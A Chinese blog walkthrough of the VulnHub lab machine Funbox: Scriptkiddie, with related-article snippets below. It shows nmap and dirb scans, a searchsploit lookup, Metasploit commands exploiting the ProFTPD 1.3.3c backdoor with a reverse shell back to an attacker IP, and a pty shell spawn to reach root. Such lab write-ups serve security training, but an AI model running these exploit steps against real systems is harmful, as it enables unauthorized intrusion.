靶场练习第二十天~vulnhub靶场之Funbox: Scriptkiddie

最新推荐文章于 2024-05-02 20:46:40 发布
最新推荐文章于 2024-05-02 20:46:40 发布
阅读量497 收藏 3
点赞数 1
分类专栏: # 靶机练习 文章标签: 安全 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_57976347/article/details/122953530
版权

一、环境搭建

靶官网机下载地址:Funbox: Scriptkiddie ~ VulnHub

百度云盘下载链接: 百度网盘 请输入提取码 提取码: i4a9

二、信息收集

1.nmap命令扫描靶机

先用ifconfig查看kali的IP,因为kali和靶机都是NAT模式下,所以用 nmap 192.168.101.0/24 扫描得到靶机ip

再使用命令查看靶机开放的端口和协议:nmap -sV -A 192.168.101.112

2.利用扫描到端口

(1)开放21、22、80等端口,先访问80端口吧

(2)进行目录探测,看看他有没有给我们一些提示:dirb http://192.168.101.112

(3)发现利用WordPress网站这条路行不通

3.SearchSploit漏洞查找工具

(1)利用21端口,在kali输入:searchsploit ProFTPD 1.3.3c

发现可以利用的后门代码

三、渗透

msfconsole框架

1.搜索proFTPD 1.3.3c可利用的脚本:search ProFTPD 1.3.3c

2.使用该脚本:use exploit/unix/ftp/proftpd_133c_backdoor

3.查看需要设置的参数:show options

4.设置RHOSTS(靶机):set RHOSTS 192.168.101.112

5.查看一下payloads的脚本:show payloads

使用反向6.链接的脚本:set payloads 3

查看要设置参数:show options

7.设置LHOST(攻击机): set LHOST 192.168.101.10

8.使用run开启攻击:

优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行):

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

9.进入到root,发现了一个flag文件

汉南帝
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
funbox:测试和工具程序
02-11
滑稽
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
FunBox11靶场 安装下载渗透详细教程
qq_41245301的博客
12-22 1002
3.通过扫描发现开启了ftp服务并且ftp的版本很低我们可用尝试通过这个服务进攻击。靶机通常在root目录下有个root.txt的文件看到它表示这个靶机已经拿下。我们发现这个版本的ftp是有漏洞的而且在msf中有对应的漏洞利用模块。-A : 启动Os检测,版本检测,脚本扫描和traceroute。通常情况我们是通过服务的名称加版本配合search进行搜索。1.提供arp-scan工具扫描网络主机IP。2.通过nmap 对目标主机进行扫描。选择一个合适的payload进行设置。查看可用的payload列表。
vulnhub靶场FunBox-2
最新发布
qq_58091216的博客
05-02 457
新建一个 MS02423文件夹把下载的压缩包文件都放进去发现里面都是加密的 id_rsa再把 /usr/share/wordlists/rockyou.txt字典 复制进去。我们可以看到报错了,那么这个办法是行不通的,我们换一个思路,我们查看ftp访问。我们可以看到成功绕过,我们查看home目录下的文件。我们看到好多的压缩包而且都是加密的,我们进行爆破。我们可以看到权限是root,我们直接查看flag。我们通过密码获取到tom的私钥,我们进行登录。我们知道tom的密码了,那么我们直接进行登录。
vulnhub靶场FunBox-1
qq_58091216的博客
05-01 396
但是我们发现不能使用,那么我们就换一个思路,进行解决,我们知道22端口是开启的,我们使用ssh进行登录。虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.2.0/24。我们可以想到是IP地址和域名没有进行绑定,我们进行绑定即可。首先我们使用joe进行登录,但是没有发现有用的信息。我们可以发现一个404.php,我们进行利用即可。我们查看id,发现不是root权限,我们进行提权。爆破出来2个用户名和密码,我们进行登录查看。我们可以看到/home目录,我们进行查看。
vulnhub dc1
m0_58564181的博客
07-06 1007
vulnhub dc1的渗透过程
Vue2.x(1)
qq_44930306的博客
08-29 2162
这里集结了有关Vue2.0的相关知识点,分为三大部分,这里是第一大部分.
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox5(NEXT LEVEL)
Aluxian_的博客
09-09 581
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
中兴funbox固件b18版本
07-12
中兴funbox固件,b18,android 4.4
不做Script Kiddie (网络原理上篇)
weixin_33979363的博客
09-19 106
  我们每天使用互联网,你是否想过,它是如何实现的?   全世界几十亿台电脑,连接在一起,两两通信。杭州的某一块网卡送出信号,纽约的另一块网卡居然就收到了,两者实际上根本不知道对方的物理位置,你不觉得这是很 神奇 的事情吗?   互联网的核心是一系列协议,总称为 互联网协议 Internet Protocol Suite。它们对 电脑 以及各种 网络设备 如何 连接 和 组网,做出了详尽的规定。理...
LeetCode题解——树(四)
wardseptember的博客
06-12 363
文章目录BST将有序数组转换为二叉搜索树递归有序链表转换二叉搜索树递归中序遍历两数之和 IV - 输入 BST中序遍历二叉搜索树的最小绝对差中序遍历中序遍历优化二叉搜索树中的众数中序遍历Morris中序遍历实现 Trie (前缀树)解法键值映射解法推荐阅读 BST 将有序数组转换为二叉搜索树 将一个按照升序排列的有序数组,转换为一棵高度平衡二叉搜索树。 本题中,一个高度平衡二叉树是指一个二叉树每个节点 的左右两个子树的高度差的绝对值不超过 1。 示例: 给定有序数组: [-10,-3,0,5,9
用MATLAB解方程的三个实例
热门推荐
liukuangye123的专栏
05-04 2万+
用MATLAB解方程的三个实例 1、对于多项式p(x)=x3-6x2-72x-27,求多项式p(x)=0的根,可用多项式求根函数roots(p),其中p为多项式系数向量,即 >>p =[1,-6,-72,-27] p =     1.00 -6.00 -72.00 -27.00 p是多项式的MATLAB描述方法,我们可用poly2str(p,'x')函数,来显示多项式的形式: >>px
VulnHub打靶のLazySysAdmin
壊壊的诱惑你的博客
10-09 1389
靶机地址: https://drive.google.com/uc?id=0B_A-fCfoBmkLOXN5Y1ZmZnpDQTQ&amp;export=download nmap -sP 或netdiscover -r 扫描目标机:这里192.168.1.159为目标机。 nmap开路扫描全端口: root@Kali-X86:~# nmap -sV -p- 192.168.1.159 St...
ftp服务后门
rlenew的博客
05-28 542
主机:192.168.136.133 靶机:192.168.136.128 用nmap扫靶机 先对21端口入手,用msf查看该版本漏洞 这里利用exploit/unix/ftp/proftpd_133c_backdoor版本后门漏洞渗透,设置参数然后run 直接入侵,查看权限。
靶机渗透练习26-Funbox5-Next Level
hirak0的博客
04-18 933
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-next-level,547/ Description Lets separate the script-kids from script-teenies. Hint: The first impression is not always the right one! If you need hints, call me on twitter: @0815R2d2 Have fun… This works bet
Protein Cell:扩增子和宏基因组数据分析实用指南
刘永鑫的博客——宏基因组公众号
07-14 1万+
扩增子和宏基因组数据分析实用指南A practical guide to amplicon and metagenomic analysis of microbiome dataProt...
vulnhub AI: Web: 1
weixin_30709635的博客
09-18 133
vulnhub AI: Web: 1 提取flag攻略 导入虚拟机,开机。 扫描NAT的C段,确定虚拟机IP和开放端口。 尝试访问该网站 发现什么都没有,抽根烟冷静一下...... 来波目录扫描吧 使用dirsearch 进行目录扫描 扫描发现存在 robots.txt文件 访问该文件看看有啥新发现 对以下目录继续进行目录扫描 http:/...
FUNBOX: UNDER CONSTRUCTION!
08-16
FUNBOX: UNDER CONSTRUCTION! 是一个面向初学者的基础级 BootToRoot 机器,难度较低。它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值